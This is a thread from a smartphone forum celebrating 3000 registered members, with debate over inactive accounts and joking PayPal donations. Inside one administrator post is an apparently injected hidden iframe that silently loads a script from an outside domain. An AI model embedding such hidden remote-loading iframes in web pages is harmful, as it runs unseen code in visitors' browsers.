+ Reply to Thread

Thread: 3000+ members!

3000+ members!

Smartphonesource.com has now reached over 3000 registered memembers!

Welcome to all the newest members!
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --Jazz--

COOL!
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

wowowowowow

That is great, just think about all the 6035 users that are missing out.

Cant wait for the 7135 and then the users my grow even more, of course, all us 6035 users will switch forums LOLLOL

Great Job!
    Dr. Van Nostren, from the clinic

Administrator
    Kudos to JJ and Jazz!

congratulations!?...

hmmm...

over 2500 of those have not posted since before Dec.31, 2001 though.

congrats, anyway.

it would be nice if the "dead" members could be deleted so we really know where we stand.
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

Re: congratulations!?...

Originally posted by iBug
    hmmm...

over 2500 of those have not posted since before Dec.31, 2001 though.

congrats, anyway.

it would be nice if the "dead" members could be deleted so we really know where we stand.
    Just beause they have not posted does not mean that most of them are not active users of the board. Many of those "dead" users actually frequent the board regularly. There are other functions, like email and private messaging, that are in use. Also, people register to show their support for the board.

I'm not naive, I know that there are "dead" members, however, it certainly is not as high as 2500. I don't feel that deleting everyone that has not posted is the proper course of action.

Just my .02
    -=Jimmyjoe=-

Re: Re: congratulations!?...

Originally posted by jimmyjoe
    Just beause they have not posted does not mean that most of them are not active users of the board. Many of those "dead" users actually frequent the board regularly. There are other functions, like email and private messaging, that are in use. Also, people register to show their support for the board.

I'm not naive, I know that there are "dead" members, however, it certainly is not as high as 2500. I don't feel that deleting everyone that has not posted is the proper course of action.

Just my .02
    and it's your .02 that really matters.

i just think it would be cool if the #s that we see were more representative of the group of "active" users.

i'm just a bug.
    iBug

Administrator
    hey JJ,

for all this effort and apparent love for their products, the kyo geeks should give you a free 7135 or something.

know what i mean?

Originally posted by marctronixx
    for all this effort and apparent love for their products, the kyo geeks should give you a free 7135 or something.
    Yeah, really... I wonder how many 7135's will be sold to people who visited this forum and learned about all of the 7135's features here? Of course many of us have been sold on the 7135 for a while, but I'm sure there are many visitors that would've otherwise been on the fence

You are performing a very valuable public service jimmyjoe!
    Please visit my picture site: Robert-O-Rama :)

free 7135 for jimmyjoe...

Originally posted by marctronixx
    hey JJ,

know what i mean?
    great idea!!

i'll send in my dime <via paypal> and now all you have to do marc is get the other "3000" members to send in their dimes too and we'll have $300 (if my math is holding up). if no cell contract will be gotten, just let me know and i'll send in double the money (20 cents).

good luck with the project.
    iBug

Re: free 7135 for jimmyjoe...

great idea!!

i'll send in my dime <via paypal> and now all you have to do marc is get the other "3000" members to send in their dimes too and we'll have $300 (if my math is holding up). if no cell contract will be gotten, just let me know and i'll send in double the money (20 cents).

good luck with the project.
    ok, my part is complete.

now, how bout everyone else... let's go.
    iBug

Re: Re: free 7135 for jimmyjoe...

ok, my part is complete.

now, how bout everyone else... let's go.

Please, let's not make this a habit.... it does us no good considering PayPal's fee for your $.10 donation was $.10
    Attached Thumbnails Attached Thumbnails 3000+ members!-paypal10cent.jpg  
    --Jazz--

Re: Re: Re: free 7135 for jimmyjoe...

Originally posted by jazz
    Please, let's not make this a habit.... it does us no good considering PayPal's fee for your $.10 donation was $.10
    hey, how else to get you my share?

paypal offers FREE accounts that don't charge anything for a transaction.

i guess i could get a money order (which cost 49 cents) and mail it (35 cents, or whatever it is now) to get the money in.

let's see, then the .10 would cost almost 90 cents. wait, that sounds too much like the government. :p

iBug

Re: Re: Re: Re: free 7135 for jimmyjoe...

paypal offers FREE accounts that don't charge anything for a transaction.

PayPal does not offer FREE accounts that accept credit card payments (which is what some members of the board have chosen to do). Unfortunately our fee per transaction is $.30 plus a small %. So, any donation of less than $.30 will go directly into PayPal's pockets.

Thanks again for the gesture.
    --Jazz--

Re: Re: Re: Re: free 7135 for jimmyjoe...

No offense to anyone, but for what we all get out of the hard work that jimmyjoe and jazz put into running the boards I think that contributions should be in dollars, not cents... at least that's my 10 cents worth (um, I mean 2 cents... I'm glad that opinions can be contributed in cents, because mine aren't worth dollars )
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Re: Re: Re: free 7135 for jimmyjoe...

Originally posted by Robert K.
    No offense to anyone, but for what we all get out of the hard work that jimmyjoe and jazz put into running the boards I think that contributions should be in dollars, not cents... at least that's my 10 cents worth (um, I mean 2 cents... I'm glad that opinions can be contributed in cents, beause mine aren't worth dollars )
    please don't get me wrong...

i am not meaning any disparagement on jj or jazz.
    1. this thread was started to boast/congratulate on passing 3000 members.
    2. i questioned the validity of the number as far as "dead members" (not 1 post in almost a year).
    3. the number was "upheld":
    Originally posted by jimmyjoe
    4. i took the # of "active users" (as defined by our benefactor - jj) and paid my share. simple math, i think anyway. i hated math in school. it was also to illustrate that there are not that many real "active members".

but really, it doesn't matter. i don't really care if they want to use the inflated number. i understand the joy. i just prefer the hard cold real numbers. i prefer to "know what the facts are". i may not enjoy "the facts", i may not share "the facts" but i want to know them still. otherwise why don't we just say there are 10k members and expand the definition of "active users" to include not only people that haven't contributed even 1 post in over a year but also those that happened to follow a link and not go past the first page and also those who saw a link on another site. that would be cool!

i vote , yea!
    that sorta sounds like something the government would do, too.
    maybe it's a conspiracy.
    let's push our forum forward and not let the users that don't care enough to come back and help build, keep us down.

so, in short, i give-in. we have _____ "active users".

here's to blind loyalty.

as far as the "dollars" go.
    i am one of only 3 people out of 3000 "active users" that have previously sponsored this site (july 2002).
    i didn't give alot, but i'm tied for 2nd "Highest Donation"
    maybe some others should pony up and give more than "lip service" to jj.

i think the saying goes... "put your money where your mouth is" .
    i know that not everyone has alot of extra money, but come on... 3 people out of 3000.

chip in folks.
    if everyone will send as little as $1, then jimmyjoe will get a FREE 7135 including 1 year of service on the network of his choice, be paid back for the vbulletin software and site hosting for a year.
    but with only 3 of us, he can't go to starbucks for coffee.

i can't believe this has gone this far.
    iBug

Oh When that Shark Bites! LBOCEAN's Avatar
    JJ,

Mines on its way